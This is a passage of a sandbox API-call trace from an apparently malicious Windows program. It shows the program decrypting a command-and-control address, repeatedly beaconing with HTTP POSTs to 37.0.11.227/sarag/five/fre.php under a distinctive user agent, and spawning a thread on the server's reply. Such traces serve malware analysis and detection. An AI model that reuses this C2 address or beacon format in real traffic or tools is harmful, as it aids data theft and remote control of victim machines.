(HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0221.459] GetProcessHeap () returned 0x690000 [0221.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.459] GetProcessHeap () returned 0x690000 [0221.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0221.459] GetProcessHeap () returned 0x690000 [0221.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0221.460] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.461] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.461] GetProcessHeap () returned 0x690000 [0221.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0221.461] GetProcessHeap () returned 0x690000 [0221.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.462] send (s=0x568, buf=0x6ab500*, len=242, flags=0) returned 242 [0221.462] send (s=0x568, buf=0x6aba40*, len=159, flags=0) returned 159 [0221.462] GetProcessHeap () returned 0x690000 [0221.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0221.462] recv (in: s=0x568, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0221.543] GetProcessHeap () returned 0x690000 [0221.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0221.543] GetProcessHeap () returned 0x690000 [0221.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0221.546] GetProcessHeap () returned 0x690000 [0221.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0221.546] GetProcessHeap () returned 0x690000 [0221.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0221.547] closesocket (s=0x568) returned 0 [0221.547] GetProcessHeap () returned 0x690000 [0221.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0221.547] GetProcessHeap () returned 0x690000 [0221.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.548] GetProcessHeap () returned 0x690000 [0221.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0221.548] GetProcessHeap () returned 0x690000 [0221.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0221.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4fc) returned 0x568 [0221.550] Sleep (dwMilliseconds=0xea60) [0221.552] GetProcessHeap () returned 0x690000 [0221.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0221.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.561] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0221.568] GetProcessHeap () returned 0x690000 [0221.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0221.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.570] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.572] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.572] GetProcessHeap () returned 0x690000 [0221.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0221.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.574] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0221.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.576] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.579] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0221.579] GetProcessHeap () returned 0x690000 [0221.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0221.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.580] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.581] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.582] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.586] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.586] GetProcessHeap () returned 0x690000 [0221.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0221.586] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.587] GetProcessHeap () returned 0x690000 [0221.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0221.587] GetProcessHeap () returned 0x690000 [0221.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0221.591] GetProcessHeap () returned 0x690000 [0221.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0221.591] GetProcessHeap () returned 0x690000 [0221.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0221.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0221.606] GetProcessHeap () returned 0x690000 [0221.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0221.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.607] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.610] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.610] GetProcessHeap () returned 0x690000 [0221.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0221.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.614] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0221.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.617] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.619] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0221.619] GetProcessHeap () returned 0x690000 [0221.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.620] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0221.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.623] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0221.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.624] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0221.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.625] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0221.625] GetProcessHeap () returned 0x690000 [0221.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0221.625] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0221.625] GetProcessHeap () returned 0x690000 [0221.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0221.625] socket (af=2, type=1, protocol=6) returned 0x56c [0221.625] connect (s=0x56c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0221.654] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0221.654] GetProcessHeap () returned 0x690000 [0221.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0221.654] GetProcessHeap () returned 0x690000 [0221.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0221.655] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.656] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.656] GetProcessHeap () returned 0x690000 [0221.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0221.656] GetProcessHeap () returned 0x690000 [0221.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.656] GetProcessHeap () returned 0x690000 [0221.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0221.657] GetProcessHeap () returned 0x690000 [0221.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0221.658] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.659] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.659] GetProcessHeap () returned 0x690000 [0221.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0221.659] GetProcessHeap () returned 0x690000 [0221.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.660] send (s=0x56c, buf=0x6ad508*, len=242, flags=0) returned 242 [0221.661] send (s=0x56c, buf=0x6aba40*, len=159, flags=0) returned 159 [0221.661] GetProcessHeap () returned 0x690000 [0221.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0221.661] recv (in: s=0x56c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0221.750] GetProcessHeap () returned 0x690000 [0221.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0221.751] GetProcessHeap () returned 0x690000 [0221.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0221.753] GetProcessHeap () returned 0x690000 [0221.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0221.753] GetProcessHeap () returned 0x690000 [0221.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0221.754] closesocket (s=0x56c) returned 0 [0221.755] GetProcessHeap () returned 0x690000 [0221.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0221.755] GetProcessHeap () returned 0x690000 [0221.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.756] GetProcessHeap () returned 0x690000 [0221.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0221.756] GetProcessHeap () returned 0x690000 [0221.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0221.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf54) returned 0x56c [0221.760] Sleep (dwMilliseconds=0xea60) [0221.764] GetProcessHeap () returned 0x690000 [0221.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0221.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0221.793] GetProcessHeap () returned 0x690000 [0221.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0221.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.795] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.798] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.800] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.800] GetProcessHeap () returned 0x690000 [0221.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0221.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.802] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0221.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.803] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.804] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0221.804] GetProcessHeap () returned 0x690000 [0221.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.805] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.806] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.807] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.809] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.809] GetProcessHeap () returned 0x690000 [0221.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0221.809] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.810] GetProcessHeap () returned 0x690000 [0221.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0221.810] GetProcessHeap () returned 0x690000 [0221.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.810] GetProcessHeap () returned 0x690000 [0221.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0221.811] GetProcessHeap () returned 0x690000 [0221.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0221.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.812] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.823] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0221.834] GetProcessHeap () returned 0x690000 [0221.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0221.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.835] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.836] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.837] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.837] GetProcessHeap () returned 0x690000 [0221.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0221.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.841] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0221.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.844] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.845] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0221.845] GetProcessHeap () returned 0x690000 [0221.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.846] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0221.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0221.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0221.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0221.850] GetProcessHeap () returned 0x690000 [0221.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0221.850] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0221.850] GetProcessHeap () returned 0x690000 [0221.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0221.850] socket (af=2, type=1, protocol=6) returned 0x570 [0221.850] connect (s=0x570, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0221.882] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0221.882] GetProcessHeap () returned 0x690000 [0221.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0221.882] GetProcessHeap () returned 0x690000 [0221.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0221.883] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.884] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.884] GetProcessHeap () returned 0x690000 [0221.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0221.884] GetProcessHeap () returned 0x690000 [0221.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.885] GetProcessHeap () returned 0x690000 [0221.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0221.885] GetProcessHeap () returned 0x690000 [0221.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0221.886] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.886] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.886] GetProcessHeap () returned 0x690000 [0221.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0221.886] GetProcessHeap () returned 0x690000 [0221.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.887] send (s=0x570, 